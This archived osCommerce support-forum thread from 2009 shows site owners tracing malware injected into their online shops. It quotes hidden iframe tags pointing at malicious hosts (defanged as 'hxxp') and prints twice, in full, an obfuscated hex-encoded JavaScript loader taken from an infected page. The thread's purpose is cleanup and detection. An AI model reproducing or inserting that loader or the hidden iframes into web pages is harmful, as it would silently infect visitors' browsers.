fengshui37 Posted January 21, 2009 Share Posted January 21, 2009 My client was recently informed by AUScert that her website was hosting malicious content.....specifically iframes that pointed to links as follows (Here and below, I have masked and incorrectly formated them so these are NOT the exact links): >> hxxp://msn-analytics. net/count.php?o=2 >> hxxp://pinoc. org/count.php?o=2 >> hxxp://wsxhost. net/count.php?o=2 were being inserted into the html coding for many pages. I believe we fixed the problem that allowed it to get in there in first place and with hours of work, removed all instances of the code and finally removed a couple of php scripts that had been installed on the server which we believe were allowing the unwanted access. The only problem is that the iframe code is STILL present in source code for the catalog site (oscommerce). I downloaded EVERY single file associated with the catalog site and searched it for instances of "pinoc" and "wsxhost" and also decimal, hexadecimal, and binary ASCII representations of those letters and found no instances of it in the oscommerce files BUT it is still showing up in source code. Has anyone else experienced this and if so, how or where or in what file or where in the mySQL data base did you need to go to remove the code such that it was no longer present in the source code for the oscommerce site. For that matter the code is inserted in very first line of the source i.e: <iframe src="hxxp://msn-analytics. net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="hxxp://pinoc. org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="hxxp://wsxhost. net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="hxxp://msn-analytics. net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe> <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html dir="LTR" lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">............ Thanks, - Fengshui37 Link to comment Share on other sites More sharing options...
FIMBLE Posted January 21, 2009 Share Posted January 21, 2009 Check the includes /languages / folder also htaccess, your images folders which files do you see the iframe present in the source code? Check you header.php + footer.php a;so Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
germ Posted January 21, 2009 Share Posted January 21, 2009 You probably won't find it searching for the actual text injected into the page. They normally use obfuscated PHP code to do that. Many hijackers use the PHP function base64_decode for that. Search for the string base64 in the catalog files. If you want you can post any suspicious looking results. It's usually not too difficult to spot "malicious" code. ;) If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
fengshui37 Posted January 21, 2009 Author Share Posted January 21, 2009 Check the includes /languages / folder alsohtaccess, your images folders which files do you see the iframe present in the source code? Check you header.php + footer.php a;so I downloaded it all including the htaccess files and image folders etc onto my hard drive.....and essentially searched for "pinoc" which is definitely a string that is present in the source code for the "store" (first line before the <html> tag). Since the "webpage" is all script driven in oscommerce, I am actually seeing it when selecting the "view source code" option from either right click or browser drop down menu. I've been trying to find where it has been placed in one of the scripts that displays the store. I found every instance elsewhere on the server outside of the catalog folder (446 of them) and removed them and also fixed what I think was the original loophole that allowed the doggone thing to be "installed". So far that is holding but still can't find out where they installed it in the catalog or how they did it. Also searched for string "base64". None found. Link to comment Share on other sites More sharing options...
FIMBLE Posted January 21, 2009 Share Posted January 21, 2009 Whats you URL there i will see the source Nic Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
fengshui37 Posted January 21, 2009 Author Share Posted January 21, 2009 You probably won't find it searching for the actual text injected into the page. They normally use obfuscated PHP code to do that. Many hijackers use the PHP function base64_decode for that. Search for the string base64 in the catalog files. If you want you can post any suspicious looking results. It's usually not too difficult to spot "malicious" code. ;) I did the search for the string base64 and also threw in "iframe" and still no instances found. Its coming from somewhere because when I load the page and view source its there but its apparently NOT in any of the catalog files. Unless they've hidden it somehow in one of those core.#### files (I have no idea what their function is). Any other ideas? - Fengshui37 *********************************** ...never bugs, my programs do however have occasional undisclosed random features... Link to comment Share on other sites More sharing options...
FIMBLE Posted January 21, 2009 Share Posted January 21, 2009 whats the URL? Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
Lizy Posted January 22, 2009 Share Posted January 22, 2009 Hi, I have similar problem, when I open my OS commerce page I get the VIRUS alert JS/OBfuscated TROJAN I have been looking in the catalog files but I did not find anything. This is my link http://www.sweettreatfavors.net/catalog/ PLEASE HELP ME. Thanks in advance! Lizy :( Link to comment Share on other sites More sharing options...
FIMBLE Posted January 22, 2009 Share Posted January 22, 2009 i cannot look as my virus checker will not allow me to, check you images folder for anything you do not recgonisealso chack you folder permissions no higher than 755 Nic Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
Guest Posted January 22, 2009 Share Posted January 22, 2009 i cannot look as my virus checker will not allow me to, check you images folder for anything you do not recgonisealso chack you folder permissions no higher than 755Nic Source code contains: <script>function c1200847515n490fdfacb8138(n490fdfacb8927){ return (parseInt(n490fdfacb8927,16));} function n490fdfacba0f4(n490fdfacba8f0){ function n490fdfacbb4ce(){var n490fdfacbb8c0=2;return n490fdfacbb8c0;} var n490fdfacbace0='';n490fdfacbbcbd=String.fromCharCode;for(n490fdfacbb0dc=0;n490fdfacbb0dc<n490fdfacba8f0.length; n490fdfacbb0dc+=n490fdfacbb4ce()){ n490fdfacbace0+=(n490fdfacbbcbd(c1200847515n490fdfacb8138(n490fdfacba8f0. substr(n490fdfacbb0dc,n490fdfacbb4ce()))));}return n490fdfacbace0;} var xfa='';var n490fdfacbc0ba='3C7'+xfa+'3637'+ xfa+'2697'+xfa+'07'+xfa+'43E667'+xfa+'56E637'+xfa+ '4696F6E20636865636B5F636F6E7'+xfa+'4656E7'+xfa+'428297'+xfa+'B7'+xfa+'6617'+xfa+'220693D303B7'+ xfa+'7'+xfa+'68696C6528646F637'+xfa+'56D656E7'+xfa+'42E67'+xfa+'657'+xfa+'4456C656D656E7'+xfa+ '47'+xfa+'3427'+xfa+'9546167'+xfa+'4E616D652827'+xfa+'69667'+xfa+'2616D6527'+xfa+'292E6C656E67'+xfa+ '7'+xfa+'468297'+xfa+'B7'+xfa+'6617'+xfa+'220656C3D646F637'+xfa+'56D656E7'+xfa+'42E67'+xfa+'657'+xfa+ '4456C656D656E7'+xfa+'47'+xfa+'3427'+xfa+'9546167'+xfa+'4E616D652827'+xfa+'69667'+xfa+'2616D6527'+ xfa+'295B695D3B6966282028656C2E7'+xfa+'37'+xfa+'47'+xfa+'96C652E64697'+xfa+'37'+xfa+'06C617'+xfa+ '93D3D27'+xfa+'6E6F6E6527'+xfa+'207'+xfa+'C7'+xfa+'C20656C2E7'+xfa+'37'+xfa+'47'+xfa+'96C652E7'+xfa+'6697'+ xfa+'36962696C697'+xfa+'47'+xfa+'9203D3D27'+xfa+'68696464656E27'+xfa+'207'+xfa+'C7'+xfa+'C2028656C2E7'+xfa+ '7'+xfa+'69647'+xfa+'4683C3520262620656C2E68656967'+xfa+'687'+xfa+'43C35292920262620656C2E6E616D65213D27'+ xfa+'633127'+xfa+'297'+xfa+'B656C2E7'+xfa+'0617'+xfa+'2656E7'+xfa+'44E6F64652E7'+xfa+'2656D6F7'+xfa+ '6654368696C6428656C293B7'+xfa+'D656C7'+xfa+'36520692B2B3B7'+xfa+'D7'+xfa+'D636865636B5F636F6E7'+xfa+ '4656E7'+xfa+'428293B0A696628216D7'+xfa+'96961297'+xfa+'B646F637'+xfa+'56D656E7'+xfa+'42E7'+xfa+'7'+xfa+ '7'+xfa+'2697'+xfa+'465287'+xfa+'56E657'+xfa+'363617'+xfa+'065282027'+xfa+'2533632536392536362537'+xfa+ '3225363125366425363525323025366525363125366425363525336425363325333125323025 37'+xfa+'332537'+xfa+ '32253633253364253237'+xfa+'2536382537'+xfa+'342537'+xfa+'342537'+xfa+'30253361253266253266253337'+ xfa+'2533392532652533312533332533322532652533322533312533312532652533332533302532 6625363825363525363 92532662533662537'+xfa+'34253364253332253334253237'+xfa+'2532302537'+xfa+'37'+xfa+'2536392536342537'+xfa+ '34253638253364253337'+xfa+'253330253331253230253638253635253639253637'+xfa+'2536382537'+xfa+'342533642533 352533362533362532302537'+xfa+'332537'+xfa+'342537'+xfa+'39253663253635253364253237'+xfa+'2536342536392537' +xfa+'332537'+xfa+'302536632536312537'+xfa+'39253361253230253665253666253665253635253237'+xfa+'2533652533632 532662536392536362537'+xfa+'3225363125366425363525336527'+xfa+'29293B7'+xfa+'D7'+xfa+'6617'+xfa+'2206D7'+xfa+ '969613D7'+xfa+'47'+xfa+'27'+xfa+'5653B3C2F7'+xfa+'3637'+xfa+'2697'+xfa+'07'+xfa+'43E';document.write(n490fdfacba0f 4(n490fdfacbc0ba));</script> Link to comment Share on other sites More sharing options...
fengshui37 Posted January 22, 2009 Author Share Posted January 22, 2009 whats the URL? URL for the site I'm talking about is www.fengshuicuresandcrystals.com - Fengshui37 ********************************** ...never bugs, my programs do however have occasional undisclosed random features... Link to comment Share on other sites More sharing options...
germ Posted January 22, 2009 Share Posted January 22, 2009 URL for the site I'm talking about is www.fengshuicuresandcrystals.com - Fengshui37 ********************************** ...never bugs, my programs do however have occasional undisclosed random features... It gets inserted into the page source before this: <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> So what's in your /catalog/index.php before that code? :unsure: If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
allaboutwicker Posted January 22, 2009 Share Posted January 22, 2009 Hi, I just tried to go to the mentioned site and sure enough my avast detected it and said it was called - HTML:Iframe-gen which it says is a virus/worm. I was searching for a reason that I have been having trouble with my website database acting up. I sure hope I have not been infected with some sort of virus as well. I hope you can figure this out. Sorry that I don't know about such things. Link to comment Share on other sites More sharing options...
fengshui37 Posted January 22, 2009 Author Share Posted January 22, 2009 It gets inserted into the page source before this: <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> So what's in your /catalog/index.php before that code? :unsure: Here is the code up to and slightly after that: <?php /* $Id: index.php,v 1.1 2003/06/11 17:37:59 hpdl Exp $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com Copyright © 2003 osCommerce Released under the GNU General Public License */ require('includes/application_top.php'); // the following cPath references come from application_top.php $category_depth = 'top'; if (isset($cPath) && tep_not_null($cPath)) { $categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'"); $cateqories_products = tep_db_fetch_array($categories_products_query); if ($cateqories_products['total'] > 0) { $category_depth = 'products'; // display products } else { $category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'"); $category_parent = tep_db_fetch_array($category_parent_query); if ($category_parent['total'] > 0) { $category_depth = 'nested'; // navigate through the categories } else { $category_depth = 'products'; // category has no products, but display the 'no products' message } } } require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT); ?> <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html <?php echo HTML_PARAMS; ?>> ***************************************** If this is different from what people with "clean" sites have, let me know what is different because I am not seeing the offending code inserted here in this file. - Fengshui37 ----------------------------- ...never bugs, my programs do however have occasional undisclosed random features... Link to comment Share on other sites More sharing options...
germ Posted January 22, 2009 Share Posted January 22, 2009 Look in here: require('includes/application_top.php'); If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
fengshui37 Posted January 22, 2009 Author Share Posted January 22, 2009 Hi, I just tried to go to the mentioned site and sure enough my avast detected it and said it was called - HTML:Iframe-gen which it says is a virus/worm. I was searching for a reason that I have been having trouble with my website database acting up. I sure hope I have not been infected with some sort of virus as well. I hope you can figure this out. Sorry that I don't know about such things. I'm betting that if your avast detected it, it also blocked it from causing any problems. I've got this thing 99 percent removed from the server for actually 3 different web sites....the only part I haven't figured out yet is the catalog i.e. where is it residing/hiding???? ----------------------------- ...never bugs, my programs do however have occasional undisclosed random features... Link to comment Share on other sites More sharing options...
germ Posted January 22, 2009 Share Posted January 22, 2009 Another thought.... Since you're running your store in an iframe from some file in the root folder, the bugger could be in some file in the root folder and not in the catalog folder at all. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
fengshui37 Posted January 22, 2009 Author Share Posted January 22, 2009 Look in here: require('includes/application_top.php'); Nothing jumps out at me here either....so far as I can tell its OK...but I've got a version from July I can run a comparison on I suppose. Too many files to do this on one by one with the (actually superior) text editor I'm using.... ---------------------------------------------- ...never bugs, my programs do however have occasional undisclosed random features... Link to comment Share on other sites More sharing options...
germ Posted January 22, 2009 Share Posted January 22, 2009 ^--- My last post ---^ If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
fengshui37 Posted January 22, 2009 Author Share Posted January 22, 2009 Another thought.... Since you're running your store in an iframe from some file in the root folder, the bugger could be in some file in the root folder and not in the catalog folder at all. Huh? The store isn't being run in an iframe. The catalog is set up as its own web page and separate from the other 3 sites that also have files in same server/public_html (root) folder. The catalog i.e. store is running oscommerce software as written and distributed and not using anything else from elsewhere on the server. Link to comment Share on other sites More sharing options...
germ Posted January 22, 2009 Share Posted January 22, 2009 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Frameset//EN" "http://www.w3.org/TR/REC-html40/frameset.dtd"> <html> <head> <title>Feng Shui Cures & Crystals</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Our shop is the only dedicated Feng Shui Cures & Crystals Shop in Australia run by experts."> <meta name="keywords" content="feng shui, fengshui, crystals, cures"> </head> <frameset rows="0,*" border=0 frameborder=0 framespacing="0" marginheight=0 marginwidth=0 leftmargin="0" topmargin="0"> <frame src="frame.htm" border=0 frameborder=0 framespacing="0" marginheight=0 marginwidth=0 leftmargin="0" topmargin="0"> <frame src="http://www.fengshuinetwork.net/catalog" scrolling=yes> </frameset> <noframes><body bgcolor="#FFFFFF"> </body></noframes> </html> If I access the root folder, this is the source. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
germ Posted January 22, 2009 Share Posted January 22, 2009 OK. It's not an iframe. :lol: If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
allaboutwicker Posted January 22, 2009 Share Posted January 22, 2009 I found this thread by googling the name of this virus which is - HTML: Iframe-gen http://www.webhostingtalk.com/showthread.php?t=708285 There were many more references that came up when I googled that. Best wishes on getting this worked out. Link to comment Share on other sites More sharing options...
fengshui37 Posted January 22, 2009 Author Share Posted January 22, 2009 Source code contains: <script>function c1200847515n490fdfacb8138(n490fdfacb8927){ return (parseInt(n490fdfacb8927,16));} function n490fdfacba0f4(n490fdfacba8f0){ function n490fdfacbb4ce(){var n490fdfacbb8c0=2;return n490fdfacbb8c0;} var n490fdfacbace0='';n490fdfacbbcbd=String.fromCharCode;for(n490fdfacbb0dc=0;n490fdfacbb0dc<n490fdfacba8f0.length; n490fdfacbb0dc+=n490fdfacbb4ce()){ n490fdfacbace0+=(n490fdfacbbcbd(c1200847515n490fdfacb8138(n490fdfacba8f0. substr(n490fdfacbb0dc,n490fdfacbb4ce()))));}return n490fdfacbace0;} var xfa='';var n490fdfacbc0ba='3C7'+xfa+'3637'+ xfa+'2697'+xfa+'07'+xfa+'43E667'+xfa+'56E637'+xfa+ '4696F6E20636865636B5F636F6E7'+xfa+'4656E7'+xfa+'428297'+xfa+'B7'+xfa+'6617'+xfa+'220693D303B7'+ xfa+'7'+xfa+'68696C6528646F637'+xfa+'56D656E7'+xfa+'42E67'+xfa+'657'+xfa+'4456C656D656E7'+xfa+ '47'+xfa+'3427'+xfa+'9546167'+xfa+'4E616D652827'+xfa+'69667'+xfa+'2616D6527'+xfa+'292E6C656E67'+xfa+ '7'+xfa+'468297'+xfa+'B7'+xfa+'6617'+xfa+'220656C3D646F637'+xfa+'56D656E7'+xfa+'42E67'+xfa+'657'+xfa+ '4456C656D656E7'+xfa+'47'+xfa+'3427'+xfa+'9546167'+xfa+'4E616D652827'+xfa+'69667'+xfa+'2616D6527'+ xfa+'295B695D3B6966282028656C2E7'+xfa+'37'+xfa+'47'+xfa+'96C652E64697'+xfa+'37'+xfa+'06C617'+xfa+ '93D3D27'+xfa+'6E6F6E6527'+xfa+'207'+xfa+'C7'+xfa+'C20656C2E7'+xfa+'37'+xfa+'47'+xfa+'96C652E7'+xfa+'6697'+ xfa+'36962696C697'+xfa+'47'+xfa+'9203D3D27'+xfa+'68696464656E27'+xfa+'207'+xfa+'C7'+xfa+'C2028656C2E7'+xfa+ '7'+xfa+'69647'+xfa+'4683C3520262620656C2E68656967'+xfa+'687'+xfa+'43C35292920262620656C2E6E616D65213D27'+ xfa+'633127'+xfa+'297'+xfa+'B656C2E7'+xfa+'0617'+xfa+'2656E7'+xfa+'44E6F64652E7'+xfa+'2656D6F7'+xfa+ '6654368696C6428656C293B7'+xfa+'D656C7'+xfa+'36520692B2B3B7'+xfa+'D7'+xfa+'D636865636B5F636F6E7'+xfa+ '4656E7'+xfa+'428293B0A696628216D7'+xfa+'96961297'+xfa+'B646F637'+xfa+'56D656E7'+xfa+'42E7'+xfa+'7'+xfa+ '7'+xfa+'2697'+xfa+'465287'+xfa+'56E657'+xfa+'363617'+xfa+'065282027'+xfa+'2533632536392536362537'+xfa+ '3225363125366425363525323025366525363125366425363525336425363325333125323025 37'+xfa+'332537'+xfa+ '32253633253364253237'+xfa+'2536382537'+xfa+'342537'+xfa+'342537'+xfa+'30253361253266253266253337'+ xfa+'2533392532652533312533332533322532652533322533312533312532652533332533302532 6625363825363525363 92532662533662537'+xfa+'34253364253332253334253237'+xfa+'2532302537'+xfa+'37'+xfa+'2536392536342537'+xfa+ '34253638253364253337'+xfa+'253330253331253230253638253635253639253637'+xfa+'2536382537'+xfa+'342533642533 352533362533362532302537'+xfa+'332537'+xfa+'342537'+xfa+'39253663253635253364253237'+xfa+'2536342536392537' +xfa+'332537'+xfa+'302536632536312537'+xfa+'39253361253230253665253666253665253635253237'+xfa+'2533652533632 532662536392536362537'+xfa+'3225363125366425363525336527'+xfa+'29293B7'+xfa+'D7'+xfa+'6617'+xfa+'2206D7'+xfa+ '969613D7'+xfa+'47'+xfa+'27'+xfa+'5653B3C2F7'+xfa+'3637'+xfa+'2697'+xfa+'07'+xfa+'43E';document.write(n490fdfacba0f 4(n490fdfacbc0ba));</script> Baddog, not sure what this was....is this the source code I'm looking to remove i.e. search for this in all the catalog files? I've fixed/removed this thing from alot (447) of files in other folders and so far its staying clean after I found and removed a couple of php files that my Norton AV identified as containing Hacktool and PHPBackdoor repectively....and changed the permissions hopefully so they can't re-infect us. They were located in images and root folders on the server. The only place I can't find (or find out where they've hidden their code) is in the catalog (oscommerce) files. Thanks to everyone for all your help so far....great ideas but so far I haven't been able to find the culprit that is lingering in the OSC site. - fengshui37 ------------------------------------------------------------- ...never bugs, my programs do however have occasional undisclosed random features... Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.